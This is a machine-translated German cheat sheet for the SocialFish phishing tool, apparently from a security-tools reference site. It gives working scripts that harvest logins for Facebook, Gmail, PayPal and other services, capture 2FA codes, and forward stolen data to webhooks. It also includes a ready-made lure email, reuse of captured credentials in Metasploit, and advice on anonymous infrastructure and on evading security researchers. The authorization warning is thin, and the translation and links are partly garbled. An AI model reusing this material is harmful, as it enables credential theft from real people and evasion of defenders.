SocialFish Phishing Tool Cheat Blatt¶
Überblick¶
Soziales Fisch ist ein fortschrittliches Phishing-Tool und Informationssammler entwickelt von UndeadSec. Es ist spezialisiert auf Social Media Phishing-Angriffe und umfassende Informationssammlung, Bereitstellung automatisierter Phishing-Seiten-Generation, Echtzeit-Beglaubigung Ernte, und detaillierte Opfer Profiling. Soziales Fisch enthält integrierte Vorlagen für populäre Social Media Plattformen und unterstützt benutzerdefinierte Phishing-Seiten-Erstellung.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation¶
Voraussetzungen¶
```bash
Install Python 3.6+ and pip¶
sudo apt update sudo apt install -y python3 python3-pip git
Install system dependencies¶
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev
Verify Python installation¶
python3 --version ```_
Installation von GitHub¶
```bash
Clone SocialFish repository¶
git clone https://github.com/UndeadSec/SocialFish.git cd SocialFish
Install requirements¶
pip3 install -r requirements.txt
Make executable¶
chmod +x SocialFish.py ```_
Docker Installation¶
```bash
Clone repository¶
git clone https://github.com/UndeadSec/SocialFish.git cd SocialFish
Build Docker image¶
docker build -t socialfish .
Run SocialFish container¶
docker run -it --rm -p 5000:5000 socialfish
Run with persistent data¶
docker run -it --rm -p 5000:5000 -v $(pwd)/data:/app/data socialfish ```_
Manuelle Abhängigkeiten Installation¶
```bash
Install individual dependencies¶
pip3 install flask pip3 install requests pip3 install beautifulsoup4 pip3 install colorama pip3 install pyfiglet pip3 install urllib3
Install additional tools¶
sudo apt install -y ngrok # For public tunneling sudo apt install -y apache2 # Alternative web server ```_
Basisnutzung¶
Soziales Fische¶
```bash
Start SocialFish with default settings¶
python3 SocialFish.py
Start with custom port¶
python3 SocialFish.py --port 8080
Start with custom host¶
python3 SocialFish.py --host 0.0.0.0
Start in debug mode¶
python3 SocialFish.py --debug
Start with custom template directory¶
python3 SocialFish.py --templates /path/to/templates ```_
Kommandozeilenoptionen¶
```bash
SocialFish command line options¶
python3 SocialFish.py --help
Options: --port PORT Port to run the server (default: 5000) --host HOST Host to bind the server (default: 127.0.0.1) --debug Enable debug mode --templates DIR Custom templates directory --output DIR Output directory for logs and data --ngrok Enable ngrok tunneling --ssl Enable SSL/HTTPS ```_
Web Interface Zugriff¶
```bash
Access SocialFish web interface¶
Access admin panel¶
View captured data¶
Download captured data¶
http://localhost:5000/download ```_
Eingebaute Vorlagen¶
Social Media Plattformen¶
```bash
Available social media templates¶
- Facebook Login
- Instagram Login
- Twitter Login
- LinkedIn Login
- Snapchat Login
- TikTok Login
- WhatsApp Web
- Telegram Web
- Discord Login
- Reddit Login ```_
Email und Cloud Services¶
```bash
Email service templates¶
- Gmail Login
- Outlook Login
- Yahoo Mail Login
- ProtonMail Login
Cloud service templates¶
- Google Drive
- Dropbox Login
- OneDrive Login
- iCloud Login ```_
Professional und Business¶
```bash
Business platform templates¶
- Microsoft Teams
- Slack Login
- Zoom Login
- Skype Login
- Adobe Creative Cloud
- Salesforce Login ```_
Spiele und Unterhaltung¶
```bash
Gaming platform templates¶
- Steam Login
- Epic Games
- PlayStation Network
- Xbox Live
- Twitch Login
- YouTube Login ```_
Finanzen und Einkaufen¶
```bash
Financial service templates¶
- PayPal Login
- Amazon Login
- eBay Login
- Netflix Login
- Spotify Login ```_
Projektleitung¶
Verwendung von integrierten Vorlagen¶
```bash
Select template from web interface¶
- Access http://localhost:5000
- Choose target platform
- Configure template settings
- Generate phishing page
- Start campaign
Command line template selection¶
python3 SocialFish.py --template facebook python3 SocialFish.py --template instagram python3 SocialFish.py --template gmail ```_
Benutzerdefinierte Vorlage Erstellung¶
```html
Forgot your password? Reset here
```_
Vorlagenkonfiguration¶
json
\\\\{
"template_name": "custom_platform",
"display_name": "Custom Platform Login",
"description": "Custom phishing template for specific platform",
"author": "Security Tester",
"version": "1.0",
"target_url": "https://custom-platform.com/login",
"redirect_url": "https://custom-platform.com/dashboard",
"files": \\\\{
"html": "custom_template.html",
"css": "custom_styles.css",
"js": "custom_script.js",
"images": ["logo.png", "background.jpg"]
\\\\},
"form_fields": [
\\\\{
"name": "username",
"type": "text",
"required": true,
"label": "Username or Email"
\\\\},
\\\\{
"name": "password",
"type": "password",
"required": true,
"label": "Password"
\\\\}
],
"additional_data": [
"user_agent",
"ip_address",
"geolocation",
"browser_info",
"screen_resolution"
]
\\\\}_
Kampagnenmanagement¶
Kampagnen erstellen¶
```bash
Web interface campaign creation¶
- Access admin panel: http://localhost:5000/admin
- Select "New Campaign"
- Choose template
- Configure settings:
- Campaign name
- Target URL
- Redirect URL
- Data collection options
- Generate phishing URL
- Start campaign ```_
Kampagnenkonfigurationsoptionen¶
```python
Campaign configuration example¶
campaign_config = \\{ "name": "Social Media Test Campaign", "template": "facebook", "target_platform": "Facebook", "redirect_url": "https://facebook.com", "data_collection": \\{ "credentials": True, "browser_info": True, "geolocation": True, "device_info": True, "session_data": True \\}, "security": \\{ "ip_filtering": ["192.168.1.0/24"], "user_agent_filtering": True, "geo_filtering": ["US", "CA", "GB"], "time_restrictions": \\{ "start_time": "09:00", "end_time": "17:00", "timezone": "UTC" \\} \\}, "notifications": \\{ "webhook_url": "https://your-server.com/webhook", "email_alerts": True, "slack_integration": True \\} \\} ```_
Erweiterte Kampagne Funktionen¶
```python
Multi-stage phishing campaign¶
multi_stage_config = \\{ "stages": [ \\{ "stage": 1, "template": "email_verification", "description": "Email verification page", "data_collection": ["email", "browser_info"], "redirect_to_stage": 2 \\}, \\{ "stage": 2, "template": "facebook_login", "description": "Facebook login page", "data_collection": ["credentials", "session_data"], "redirect_to_stage": 3 \\}, \\{ "stage": 3, "template": "2fa_verification", "description": "Two-factor authentication", "data_collection": ["2fa_code", "device_info"], "redirect_url": "https://facebook.com" \\} ] \\} ```_
Datenerhebung und -analyse¶
Datentypen erfassen¶
```bash
Credential data¶
- Username/Email
- Password
- Security questions
- PIN codes
- 2FA tokens
Browser information¶
- User Agent
- Browser version
- Installed plugins
- Screen resolution
- Operating system
Network information¶
- IP address
- Geolocation
- ISP information
- Proxy detection
- VPN detection
Device information¶
- Device type
- Hardware specs
- Mobile device info
- Battery level
- Network type
Behavioral data¶
- Mouse movements
- Keystroke patterns
- Time spent on page
- Click patterns
- Form interaction ```_
Echtzeitüberwachung¶
```python
Real-time data monitoring script¶
import requests import json import time from datetime import datetime
class SocialFishMonitor: def init(self, base_url="http://localhost:5000"): self.base_url = base_url self.last_check = datetime.now()
def get_captured_data(self):
"""Retrieve captured data from SocialFish"""
try:
response = requests.get(f"\\\\{self.base_url\\\\}/api/data")
if response.status_code == 200:
return response.json()
except Exception as e:
print(f"Error retrieving data: \\\\{e\\\\}")
return []
def monitor_new_captures(self):
"""Monitor for new captured data"""
while True:
data = self.get_captured_data()
new_captures = [
item for item in data
if datetime.fromisoformat(item['timestamp']) > self.last_check
]
for capture in new_captures:
self.process_new_capture(capture)
if new_captures:
self.last_check = datetime.now()
time.sleep(10)
def process_new_capture(self, capture):
"""Process new captured data"""
print(f"[+] New capture: \\\\{capture['type']\\\\}")
print(f" IP: \\\\{capture.get('ip_address', 'Unknown')\\\\}")
print(f" User Agent: \\\\{capture.get('user_agent', 'Unknown')\\\\}")
print(f" Timestamp: \\\\{capture['timestamp']\\\\}")
# Send notifications
self.send_notification(capture)
# Export data
self.export_capture(capture)
def send_notification(self, capture):
"""Send notification for new capture"""
webhook_url = "https://your-server.com/webhook"
payload = \\\\{
"text": f"New SocialFish capture from \\\\{capture.get('ip_address', 'Unknown')\\\\}",
"capture_data": capture
\\\\}
try:
requests.post(webhook_url, json=payload)
except Exception as e:
print(f"Failed to send notification: \\\\{e\\\\}")
def export_capture(self, capture):
"""Export captured data"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"capture_\\\\{timestamp\\\\}.json"
with open(filename, 'w') as f:
json.dump(capture, f, indent=2)
print(f"[+] Data exported to: \\\\{filename\\\\}")
Usage¶
monitor = SocialFishMonitor() monitor.monitor_new_captures() ```_
Datenanalyse Werkzeuge¶
```python
Data analysis and reporting¶
import pandas as pd import matplotlib.pyplot as plt import seaborn as sns from collections import Counter
class SocialFishAnalyzer: def init(self, data_file): self.data = pd.read_json(data_file)
def analyze_geographic_distribution(self):
"""Analyze geographic distribution of victims"""
country_counts = Counter(self.data['country'])
plt.figure(figsize=(12, 6))
countries = list(country_counts.keys())[:10]
counts = list(country_counts.values())[:10]
plt.bar(countries, counts)
plt.title('Geographic Distribution of Phishing Victims')
plt.xlabel('Country')
plt.ylabel('Number of Victims')
plt.xticks(rotation=45)
plt.tight_layout()
plt.savefig('geographic_distribution.png')
plt.show()
def analyze_browser_usage(self):
"""Analyze browser usage patterns"""
browsers = []
for ua in self.data['user_agent']:
if 'Chrome' in ua:
browsers.append('Chrome')
elif 'Firefox' in ua:
browsers.append('Firefox')
elif 'Safari' in ua:
browsers.append('Safari')
elif 'Edge' in ua:
browsers.append('Edge')
else:
browsers.append('Other')
browser_counts = Counter(browsers)
plt.figure(figsize=(8, 8))
plt.pie(browser_counts.values(), labels=browser_counts.keys(), autopct='%1.1f%%')
plt.title('Browser Usage Distribution')
plt.savefig('browser_distribution.png')
plt.show()
def analyze_time_patterns(self):
"""Analyze time-based patterns"""
self.data['timestamp'] = pd.to_datetime(self.data['timestamp'])
self.data['hour'] = self.data['timestamp'].dt.hour
hourly_counts = self.data['hour'].value_counts().sort_index()
plt.figure(figsize=(12, 6))
plt.plot(hourly_counts.index, hourly_counts.values, marker='o')
plt.title('Phishing Activity by Hour of Day')
plt.xlabel('Hour of Day')
plt.ylabel('Number of Victims')
plt.grid(True)
plt.savefig('time_patterns.png')
plt.show()
def generate_report(self):
"""Generate comprehensive analysis report"""
report = \\\\{
'total_victims': len(self.data),
'unique_ips': self.data['ip_address'].nunique(),
'top_countries': dict(Counter(self.data['country']).most_common(5)),
'success_rate': len(self.data[self.data['credentials_captured'] == True]) / len(self.data) * 100,
'average_time_on_page': self.data['time_on_page'].mean(),
'mobile_percentage': len(self.data[self.data['device_type'] == 'mobile']) / len(self.data) * 100
\\\\}
return report
Usage¶
analyzer = SocialFishAnalyzer('captured_data.json') report = analyzer.generate_report() print(json.dumps(report, indent=2)) ```_
Automatisierung und Schrift¶
Python Automation Script¶
```python
!/usr/bin/env python3¶
SocialFish automation script¶
import requests import json import time import subprocess import threading from datetime import datetime
class SocialFishAutomation: def init(self, host="localhost", port=5000): self.base_url = f"http://\\{host\\}:\\{port\\}" self.process = None self.monitoring = False
def start_socialfish(self, template="facebook"):
"""Start SocialFish with specified template"""
cmd = [
"python3", "SocialFish.py",
"--host", "0.0.0.0",
"--port", str(self.port),
"--template", template
]
self.process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Wait for server to start
time.sleep(10)
# Verify server is running
try:
response = requests.get(self.base_url, timeout=5)
if response.status_code == 200:
print("[+] SocialFish started successfully")
return True
except:
pass
print("[-] Failed to start SocialFish")
return False
def create_campaign(self, config):
"""Create new phishing campaign"""
try:
response = requests.post(f"\\\\{self.base_url\\\\}/api/campaign", json=config)
if response.status_code == 200:
campaign_data = response.json()
print(f"[+] Campaign created: \\\\{campaign_data['url']\\\\}")
return campaign_data
except Exception as e:
print(f"[-] Failed to create campaign: \\\\{e\\\\}")
return None
def get_phishing_url(self, campaign_id):
"""Get phishing URL for campaign"""
try:
response = requests.get(f"\\\\{self.base_url\\\\}/api/campaign/\\\\{campaign_id\\\\}")
if response.status_code == 200:
return response.json()['url']
except Exception as e:
print(f"[-] Failed to get phishing URL: \\\\{e\\\\}")
return None
def monitor_captures(self):
"""Monitor captured data in real-time"""
self.monitoring = True
last_count = 0
while self.monitoring:
try:
response = requests.get(f"\\\\{self.base_url\\\\}/api/captures")
if response.status_code == 200:
captures = response.json()
current_count = len(captures)
if current_count > last_count:
new_captures = captures[last_count:]
for capture in new_captures:
self.process_capture(capture)
last_count = current_count
time.sleep(5)
except Exception as e:
print(f"[-] Monitoring error: \\\\{e\\\\}")
time.sleep(10)
def process_capture(self, capture):
"""Process new captured data"""
print(f"[+] New victim: \\\\{capture.get('ip_address', 'Unknown')\\\\}")
# Extract credentials if available
if 'credentials' in capture:
username = capture['credentials'].get('username', 'N/A')
password = capture['credentials'].get('password', 'N/A')
print(f" Username: \\\\{username\\\\}")
print(f" Password: \\\\{'*' * len(password)\\\\}")
# Extract device information
if 'device_info' in capture:
device = capture['device_info']
print(f" Device: \\\\{device.get('type', 'Unknown')\\\\} - \\\\{device.get('os', 'Unknown')\\\\}")
print(f" Browser: \\\\{device.get('browser', 'Unknown')\\\\}")
# Send notification
self.send_notification(capture)
# Export data
self.export_capture(capture)
def send_notification(self, capture):
"""Send notification for new capture"""
# Slack notification
slack_webhook = "https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK"
message = \\\\{
"text": f"🎣 New SocialFish Capture",
"attachments": [
\\\\{
"color": "good",
"fields": [
\\\\{
"title": "IP Address",
"value": capture.get('ip_address', 'Unknown'),
"short": True
\\\\},
\\\\{
"title": "Country",
"value": capture.get('country', 'Unknown'),
"short": True
\\\\},
\\\\{
"title": "User Agent",
"value": capture.get('user_agent', 'Unknown')[:50] + "...",
"short": False
\\\\}
]
\\\\}
]
\\\\}
try:
requests.post(slack_webhook, json=message)
except Exception as e:
print(f"[-] Failed to send Slack notification: \\\\{e\\\\}")
def export_capture(self, capture):
"""Export captured data to file"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"socialfish_capture_\\\\{timestamp\\\\}.json"
with open(filename, 'w') as f:
json.dump(capture, f, indent=2)
print(f"[+] Data exported to: \\\\{filename\\\\}")
def setup_ngrok_tunnel(self):
"""Setup ngrok tunnel for public access"""
try:
# Start ngrok tunnel
ngrok_process = subprocess.Popen([
"ngrok", "http", str(self.port)
], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(5)
# Get public URL
response = requests.get("http://localhost:4040/api/tunnels")
if response.status_code == 200:
tunnels = response.json()['tunnels']
if tunnels:
public_url = tunnels[0]['public_url']
print(f"[+] Public URL: \\\\{public_url\\\\}")
return public_url
except Exception as e:
print(f"[-] Failed to setup ngrok tunnel: \\\\{e\\\\}")
return None
def automated_campaign(self, templates, duration_hours=24):
"""Run automated multi-template campaign"""
print("[+] Starting automated SocialFish campaign...")
# Setup ngrok tunnel
public_url = self.setup_ngrok_tunnel()
campaigns = []
# Create campaigns for each template
for template in templates:
config = \\\\{
"template": template,
"name": f"Auto Campaign - \\\\{template\\\\}",
"redirect_url": f"https://\\\\{template.lower()\\\\}.com",
"data_collection": \\\\{
"credentials": True,
"browser_info": True,
"geolocation": True
\\\\}
\\\\}
campaign = self.create_campaign(config)
if campaign:
campaigns.append(campaign)
print(f"[+] \\\\{template\\\\} campaign URL: \\\\{public_url\\\\}\\\\{campaign['path']\\\\}")
# Start monitoring
monitor_thread = threading.Thread(target=self.monitor_captures)
monitor_thread.daemon = True
monitor_thread.start()
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hours...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
print("[+] Campaign completed")
return campaigns
Usage example¶
def main(): automation = SocialFishAutomation()
# Start SocialFish
if automation.start_socialfish():
# Run automated campaign with multiple templates
templates = ["facebook", "instagram", "gmail", "linkedin"]
campaigns = automation.automated_campaign(templates, duration_hours=1)
print(f"[+] Completed \\\\{len(campaigns)\\\\} campaigns")
if name == "main": main() ```_
Bash Automation Script¶
```bash
!/bin/bash¶
SocialFish bash automation script¶
SOCIALFISH_DIR="/path/to/SocialFish" HOST="0.0.0.0" PORT="5000" TEMPLATE="facebook" DURATION="3600" # 1 hour in seconds
Function to start SocialFish¶
start_socialfish() \\{ echo "[+] Starting SocialFish..." cd "$SOCIALFISH_DIR"
python3 SocialFish.py --host "$HOST" --port "$PORT" --template "$TEMPLATE" &
SOCIALFISH_PID=$!
# Wait for server to start
sleep 10
# Check if server is running
if curl -s "http://localhost:$PORT" > /dev/null; then
echo "[+] SocialFish started successfully (PID: $SOCIALFISH_PID)"
return 0
else
echo "[-] Failed to start SocialFish"
return 1
fi
\\}
Function to setup ngrok tunnel¶
setup_ngrok() \\{ echo "[+] Setting up ngrok tunnel..." ngrok http "\(PORT" & NGROK_PID=\)!
sleep 5
# Get public URL
PUBLIC_URL=$(curl -s http://localhost:4040/api/tunnels|jq -r '.tunnels[0].public_url')
if [ "$PUBLIC_URL" != "null" ] && [ -n "$PUBLIC_URL" ]; then
echo "[+] Public URL: $PUBLIC_URL"
echo "$PUBLIC_URL" > ngrok_url.txt
return 0
else
echo "[-] Failed to get ngrok URL"
return 1
fi
\\}
Function to monitor captures¶
monitor_captures() \\{ echo "[+] Starting capture monitoring..."
while true; do
# Check for new captures
CAPTURE_COUNT=$(curl -s "http://localhost:$PORT/api/captures"|jq length)
if [ "$CAPTURE_COUNT" -gt 0 ]; then
echo "[+] $CAPTURE_COUNT capture(s) detected"
# Export latest capture
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
curl -s "http://localhost:$PORT/api/captures" > "captures_$TIMESTAMP.json"
echo "[+] Captures exported to: captures_$TIMESTAMP.json"
fi
sleep 30
done
\\}
Function to cleanup¶
cleanup() \\{ echo "[+] Cleaning up..."
if [ -n "$SOCIALFISH_PID" ]; then
kill "$SOCIALFISH_PID" 2>/dev/null
echo "[+] SocialFish stopped"
fi
if [ -n "$NGROK_PID" ]; then
kill "$NGROK_PID" 2>/dev/null
echo "[+] Ngrok tunnel stopped"
fi
exit 0
\\}
Set trap for cleanup¶
trap cleanup SIGINT SIGTERM
Main execution¶
main() \\{ echo "[+] SocialFish Automation Script" echo "[+] Template: $TEMPLATE" echo "[+] Duration: $DURATION seconds"
# Start SocialFish
if start_socialfish; then
# Setup ngrok tunnel
if setup_ngrok; then
# Start monitoring in background
monitor_captures &
MONITOR_PID=$!
# Run for specified duration
echo "[+] Campaign running for $DURATION seconds..."
sleep "$DURATION"
# Stop monitoring
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Campaign completed"
fi
fi
cleanup
\\}
Execute main function¶
main ```_
PowerShell Automation¶
```powershell
SocialFish PowerShell automation script¶
param( [string]\(SocialFishPath = "C:\Tools\SocialFish", [string]\)Host = "0.0.0.0", [int]\(Port = 5000, [string]\)Template = "facebook", [int]$DurationMinutes = 60 )
function Start-SocialFish \\{ param( [string]\(Path, [string]\)Host, [int]\(Port, [string]\)Template )
Write-Host "[+] Starting SocialFish..." -ForegroundColor Green
Set-Location $Path
$process = Start-Process -FilePath "python" -ArgumentList @(
"SocialFish.py",
"--host", $Host,
"--port", $Port,
"--template", $Template
) -PassThru -WindowStyle Hidden
# Wait for server to start
Start-Sleep -Seconds 10
# Check if server is running
try \\\\{
$response = Invoke-WebRequest -Uri "http://localhost:$Port" -TimeoutSec 5
if ($response.StatusCode -eq 200) \\\\{
Write-Host "[+] SocialFish started successfully (PID: $($process.Id))" -ForegroundColor Green
return $process
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Failed to start SocialFish" -ForegroundColor Red
return $null
\\\\}
\\}
function Start-NgrokTunnel \\{ param([int]$Port)
Write-Host "[+] Setting up ngrok tunnel..." -ForegroundColor Green
$ngrokProcess = Start-Process -FilePath "ngrok" -ArgumentList @("http", $Port) -PassThru -WindowStyle Hidden
Start-Sleep -Seconds 5
try \\\\{
$tunnelInfo = Invoke-RestMethod -Uri "http://localhost:4040/api/tunnels"
$publicUrl = $tunnelInfo.tunnels[0].public_url
if ($publicUrl) \\\\{
Write-Host "[+] Public URL: $publicUrl" -ForegroundColor Green
$publicUrl|Out-File -FilePath "ngrok_url.txt"
return @\\\\{
Process = $ngrokProcess
Url = $publicUrl
\\\\}
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Failed to get ngrok URL" -ForegroundColor Red
\\\\}
return $null
\\}
function Monitor-Captures \\{ param( [int]\(Port, [int]\)DurationMinutes )
Write-Host "[+] Starting capture monitoring for $DurationMinutes minutes..." -ForegroundColor Green
$endTime = (Get-Date).AddMinutes($DurationMinutes)
$lastCaptureCount = 0
while ((Get-Date) -lt $endTime) \\\\{
try \\\\{
$captures = Invoke-RestMethod -Uri "http://localhost:$Port/api/captures"
$currentCount = $captures.Count
if ($currentCount -gt $lastCaptureCount) \\\\{
$newCaptures = $currentCount - $lastCaptureCount
Write-Host "[+] $newCaptures new capture(s) detected" -ForegroundColor Yellow
# Export captures
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$filename = "captures_$timestamp.json"
| | $captures | ConvertTo-Json -Depth 10 | Out-File -FilePath $filename | | Write-Host "[+] Captures exported to: $filename" -ForegroundColor Green
$lastCaptureCount = $currentCount
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Error monitoring captures: $_" -ForegroundColor Red
\\\\}
Start-Sleep -Seconds 30
\\\\}
Write-Host "[+] Monitoring completed" -ForegroundColor Green
\\}
function Stop-Processes \\{ param( [System.Diagnostics.Process]\(SocialFishProcess, [System.Diagnostics.Process]\)NgrokProcess )
Write-Host "[+] Cleaning up..." -ForegroundColor Green
if ($SocialFishProcess -and !$SocialFishProcess.HasExited) \\\\{
$SocialFishProcess.Kill()
Write-Host "[+] SocialFish stopped" -ForegroundColor Green
\\\\}
if ($NgrokProcess -and !$NgrokProcess.HasExited) \\\\{
$NgrokProcess.Kill()
Write-Host "[+] Ngrok tunnel stopped" -ForegroundColor Green
\\\\}
\\}
Main execution¶
try \\{ Write-Host "[+] SocialFish PowerShell Automation" -ForegroundColor Cyan Write-Host "[+] Template: $Template" -ForegroundColor Cyan Write-Host "[+] Duration: $DurationMinutes minutes" -ForegroundColor Cyan
# Start SocialFish
$socialFishProcess = Start-SocialFish -Path $SocialFishPath -Host $Host -Port $Port -Template $Template
if ($socialFishProcess) \\\\{
# Setup ngrok tunnel
$ngrokInfo = Start-NgrokTunnel -Port $Port
if ($ngrokInfo) \\\\{
# Monitor captures
Monitor-Captures -Port $Port -DurationMinutes $DurationMinutes
# Cleanup
Stop-Processes -SocialFishProcess $socialFishProcess -NgrokProcess $ngrokInfo.Process
\\\\}
else \\\\{
Stop-Processes -SocialFishProcess $socialFishProcess
\\\\}
\\\\}
\\} catch \\{ Write-Host "[-] Script error: $" -ForegroundColor Red \\} finally \\{ Write-Host "[+] Script completed" -ForegroundColor Green \\} ```
Integration mit anderen Tools¶
GoPhys Integration¶
```python
Integrate SocialFish with GoPhish for email delivery¶
import requests import json
class GoPhishSocialFishIntegration: def init(self, gophish_url, gophish_api_key, socialfish_url): self.gophish_url = gophish_url self.gophish_api_key = gophish_api_key self.socialfish_url = socialfish_url self.headers = \\{ 'Authorization': f'Bearer \\{gophish_api_key\\}', 'Content-Type': 'application/json' \\}
def create_gophish_campaign(self, socialfish_campaign_url):
"""Create GoPhish campaign with SocialFish URL"""
campaign_data = \\\\{
"name": "SocialFish Integration Campaign",
"template": \\\\{
"name": "Social Media Login Required",
"subject": "Action Required: Verify Your Account",
"html": f"""
<html>
<body>
<h2>Account Verification Required</h2>
<p>We've detected unusual activity on your account. Please verify your identity to continue using our services.</p>
<p><a href="\\\\{socialfish_campaign_url\\\\}" style="background-color: #4CAF50; color: white; padding: 14px 20px; text-decoration: none; display: inline-block;">Verify Account</a></p>
<p>If you did not request this verification, please ignore this email.</p>
</body>
</html>
""",
"text": f"Please verify your account by visiting: \\\\{socialfish_campaign_url\\\\}"
\\\\},
"page": \\\\{
"name": "Social Media Landing",
"html": f'<script>window.location.href="\\\\{socialfish_campaign_url\\\\}";</script>',
"redirect_url": socialfish_campaign_url
\\\\},
"smtp": \\\\{
"name": "Default SMTP",
"host": "smtp.gmail.com:587",
"username": "your_email@gmail.com",
"password": "your_app_password"
\\\\},
"groups": [
\\\\{
"name": "Target Group",
"targets": [
\\\\{"email": "target1@example.com", "first_name": "John", "last_name": "Doe"\\\\},
\\\\{"email": "target2@example.com", "first_name": "Jane", "last_name": "Smith"\\\\}
]
\\\\}
]
\\\\}
response = requests.post(
f"\\\\{self.gophish_url\\\\}/api/campaigns",
headers=self.headers,
json=campaign_data
)
return response.json()
Usage¶
integration = GoPhishSocialFishIntegration( "http://localhost:3333", "your_gophish_api_key", "http://your-socialfish-url.com" )
campaign = integration.create_gophish_campaign("http://your-socialfish-url.com/facebook") ```_
SET Integration¶
```bash
Social Engineering Toolkit integration¶
Use SET for payload delivery after credential capture¶
SET configuration for SocialFish integration¶
echo " [+] SET Integration with SocialFish 1. Use SocialFish for credential harvesting 2. Use SET for payload delivery post-compromise 3. Combine social media phishing with malware delivery "
Example SET payload generation¶
setoolkit
Select: Social-Engineering Attacks¶
Select: Website Attack Vectors¶
Select: Credential Harvester Attack Method¶
Select: Custom Import¶
Import SocialFish captured credentials¶
```_
Metasploit Integration¶
```bash
Use captured credentials in Metasploit modules¶
After SocialFish captures credentials, use them for further exploitation¶
Example: Use captured email credentials¶
use auxiliary/scanner/http/owa_login set RHOSTS target-mail-server.com set USERNAME captured_username@company.com set PASSWORD captured_password run
Example: Use captured social media tokens¶
use auxiliary/gather/facebook_api set ACCESS_TOKEN captured_facebook_token run ```_
Operationelle Sicherheit¶
Sicherheit der Infrastruktur¶
```bash
Use VPS with anonymous payment¶
Implement proxy chains¶
Use domain fronting¶
Regular infrastructure rotation¶
Example secure deployment¶
1. Purchase VPS with cryptocurrency¶
2. Setup through Tor/VPN¶
3. Use legitimate domain names¶
4. Implement SSL certificates¶
5. Configure proper logging¶
```_
Verkehrsobfukation¶
```bash
Use legitimate SSL certificates¶
Implement realistic timing delays¶
Use common ports (80, 443)¶
Mimic legitimate traffic patterns¶
Example nginx configuration for traffic obfuscation¶
server \\{ listen 443 ssl; server_name legitimate-looking-domain.com;
ssl_certificate /path/to/legitimate/cert.pem;
ssl_certificate_key /path/to/legitimate/key.pem;
location / \\\\{
proxy_pass http://localhost:5000;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
\\\\}
\\} ```_
Anti-Detektionsmaßnahmen¶
```python
Implement anti-detection features¶
anti_detection_config = \\{ "user_agent_filtering": True, "ip_geolocation_filtering": True, "security_tool_detection": True, "honeypot_detection": True, "timing_randomization": True, "content_randomization": True \\}
Example anti-detection implementation¶
def detect_security_tools(user_agent, ip_address): """Detect security tools and researchers""" security_indicators = [ 'curl', 'wget', 'python-requests', 'scanner', 'bot', 'crawler', 'security', 'research' ]
for indicator in security_indicators:
if indicator.lower() in user_agent.lower():
return True
# Check for known security company IP ranges
security_ip_ranges = [
'192.168.1.0/24', # Example security company range
'10.0.0.0/8' # Example research network
]
# Implementation would check IP against ranges
return False
```_
Fehlerbehebung¶
Gemeinsame Themen¶
```bash
Port already in use¶
sudo netstat -tulpn|grep :5000 sudo kill -9 $(sudo lsof -t -i:5000)
Python dependency issues¶
pip3 install --upgrade -r requirements.txt
Template not loading¶
Check template file permissions¶
Verify template syntax¶
Check Flask template directory¶
Ngrok tunnel issues¶
Check ngrok authentication¶
Verify port forwarding¶
Test local connectivity first¶
```_
Debug Mode¶
```bash
Enable debug logging¶
python3 SocialFish.py --debug
Check Flask logs¶
tail -f socialfish.log
Test template rendering¶
curl -v http://localhost:5000/facebook
Verify API endpoints¶
curl http://localhost:5000/api/captures ```_
Best Practices¶
Kampagnenplanung¶
- Zielforschung: Zieldemografiken und Social Media Nutzung verstehen
- Auswahl: Wählen Sie entsprechende Vorlagen für das Zielpublikum
- **Infrastruktur-Setup*: Verwenden Sie sicheres und anonymes Hosting
- Test: Vollständige Testvorlagen vor dem Einsatz
- Monitoring: Implementieren Echtzeit-Capture Monitoring
Rechtliche und ethische Überlegungen¶
```bash
Authorized testing only¶
Obtain proper written authorization¶
Follow responsible disclosure¶
Protect captured data¶
Document all activities¶
Data protection measures¶
Encrypt captured credentials¶
Secure data transmission¶
Implement data retention policies¶
Regular security audits¶
```_
Leistungsoptimierung¶
```bash
Optimize for high traffic¶
Use CDN for static content¶
Implement caching¶
Monitor server resources¶
Scale horizontally if needed¶
Example performance monitoring¶
htop iotop netstat -tulpn df -h ```_
Ressourcen¶
- SocialFish GitHub Repository
- [UndeadSec Security Research](LINK_5_ -%20[Flask-Dokumentation](LINK_5 -%20(LINK_5_)
- [Anti-Phishing-Arbeitsgruppe](LINK_5_
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von SocialFish Phishing Tool. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung haben, bevor Sie Phishing-Simulationen oder Penetrationstests durchführen. *